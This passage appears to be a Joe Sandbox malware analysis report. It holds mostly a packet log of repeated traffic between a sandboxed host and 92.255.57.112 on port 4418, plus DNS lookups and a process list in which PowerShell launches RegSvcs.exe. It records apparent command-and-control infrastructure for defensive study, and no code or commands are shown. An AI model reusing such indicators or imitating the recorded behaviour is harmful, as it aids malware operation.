Jan 14, 2025 08:28:42.988985062 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:43.095818043 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:43.098047972 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:43.102890015 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:44.925972939 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:44.974931955 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:48.413074970 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:48.417943001 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:48.630199909 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:48.632499933 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:48.637501001 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:54.366735935 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:54.371671915 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:54.584188938 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:54.586258888 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:54.591059923 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:56.007085085 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:56.012336016 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:56.224581957 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:56.271815062 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:56.481043100 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:56.485958099 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:59.180643082 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:59.185565948 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:59.397392988 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:28:59.411701918 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:28:59.416574955 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.069139004 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.073988914 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.179419994 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.184365034 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.194319963 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.199208975 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.209624052 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.214529991 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.256639004 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.261451006 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.286475897 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.288599014 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.336863995 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.337042093 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.341928005 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.350189924 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.355092049 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.366161108 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.371154070 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.381735086 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.386665106 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.408688068 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.410805941 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.460910082 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.534909010 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.536689997 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.541541100 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.652679920 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.654484987 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.659440994 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.659497023 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.664335966 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.773665905 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.775816917 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.780690908 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.780742884 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.785563946 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:10.785619020 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:10.790450096 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:14.930046082 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:14.974946022 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:20.787766933 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:20.792623043 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:20.834606886 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:20.840229988 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:21.005625963 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:21.007582903 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:21.012453079 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:21.127307892 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:21.131335020 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:21.136183023 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:26.287770987 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:26.292613983 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:26.505737066 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:26.510277033 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:26.515146971 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:33.819051981 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:33.824090958 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:34.036600113 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:34.040662050 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:34.045600891 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:36.897229910 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:36.902200937 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:37.114629984 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:37.116024017 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:37.121001005 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:37.209723949 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:37.215818882 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:37.722425938 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:37.739551067 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:37.744581938 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:39.194014072 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:39.199126005 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:39.411657095 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:39.415353060 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:39.420278072 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:44.932971001 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:44.992671967 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:50.383704901 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:50.388766050 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:51.180581093 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:51.225014925 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:51.250458002 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:51.256494045 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:53.366085052 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:53.371278048 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:53.588912010 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:29:53.591335058 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:29:53.596251965 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:00.709546089 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:00.714507103 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:00.926929951 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:00.932702065 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:00.937560081 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:01.834578037 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:01.839667082 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:01.850212097 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:01.855052948 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:02.051886082 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:02.053255081 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:02.058120966 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:02.201358080 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:02.202639103 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:02.207576036 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:13.081522942 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:13.086400986 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:13.305969000 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:13.307924986 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:13.312741041 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:15.214395046 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:15.256253958 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:20.931236029 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:20.936077118 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:21.148508072 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:21.193787098 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:21.244122982 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:21.248893976 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:22.350375891 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:22.355420113 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:22.589673042 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:22.591933966 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:22.596868038 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:22.741008043 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:22.745856047 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:22.980737925 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:22.984877110 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:22.989758015 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.287822008 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.292829990 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.353056908 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.357899904 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.397641897 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.402518988 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.505064964 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.506876945 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.511733055 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.553350925 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.558247089 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.628000975 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.629442930 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.634182930 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.749463081 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.750818014 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.755623102 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.871835947 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:28.873137951 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:28.878084898 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:33.709711075 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:33.714956045 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:33.927248955 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:33.929261923 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:33.934098959 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:44.709855080 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:44.714835882 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:44.740942955 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:44.745846987 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:44.756608009 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:44.761519909 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:44.927198887 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:44.929510117 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:44.934335947 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:45.048649073 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:45.178898096 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:45.179240942 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:45.180502892 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:45.185296059 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:45.185470104 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:45.190327883 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:55.947011948 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:55.951951027 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:56.914324999 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:30:56.916244030 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:30:56.921125889 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:00.553406000 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:00.558309078 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:00.770509958 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:00.774964094 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:00.779783010 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:05.944236040 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:05.949325085 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:06.161472082 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:06.163090944 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:06.167948961 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:07.350474119 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:07.356511116 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:07.568542004 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:07.570003033 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:07.574892044 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:08.834703922 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:08.839665890 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:09.051996946 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:09.053539991 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:09.058371067 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:14.979305029 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:15.131576061 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:16.506602049 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:16.511697054 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:16.537868023 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:16.542999983 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:16.724495888 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:16.726844072 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:16.731861115 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:16.846847057 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:16.848458052 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:16.853338003 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:21.959997892 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:21.965954065 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:22.178348064 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:22.187058926 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:22.192076921 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:26.865995884 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:26.871005058 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:27.083048105 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:27.084367037 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:27.089252949 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:29.069143057 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:29.074110985 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:29.286494017 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Jan 14, 2025 08:31:29.287317991 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112 |
Jan 14, 2025 08:31:29.292058945 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 14, 2025 08:27:53.653747082 CET | 53 | 59502 | 162.159.36.2 | 192.168.2.6 |
Jan 14, 2025 08:27:54.135080099 CET | 58723 | 53 | 192.168.2.6 | 1.1.1.1 |
Jan 14, 2025 08:27:54.142162085 CET | 53 | 58723 | 1.1.1.1 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Jan 14, 2025 08:27:54.135080099 CET | 192.168.2.6 | 1.1.1.1 | 0xf8e | Standard query (0) | PTR (Pointer record) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Jan 14, 2025 08:27:54.142162085 CET | 1.1.1.1 | 192.168.2.6 | 0xf8e | Name error (3) | none | none | PTR (Pointer record) | IN (0x0001) | false |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:27:21 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | true |
Target ID: | 1 |
Start time: | 02:27:21 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:27:24 |
Start date: | 14/01/2025 |
Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x760000 |
File size: | 45'984 bytes |
MD5 hash: | 9D352BC46709F0CB5EC974633A0C3C94 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Reputation: | high |
Has exited: | false |
Target ID: | 4 |
Start time: | 02:27:24 |
Start date: | 14/01/2025 |
Path: | C:\Windows\System32\wermgr.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff794bc0000 |
File size: | 229'728 bytes |
MD5 hash: | 74A0194782E039ACE1F7349544DC1CF4 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | true |
Execution Graph
Execution Coverage: | 2.4% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 0% |
Total number of Nodes: | 7 |
Total number of Limit Nodes: | 0 |
Graph
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
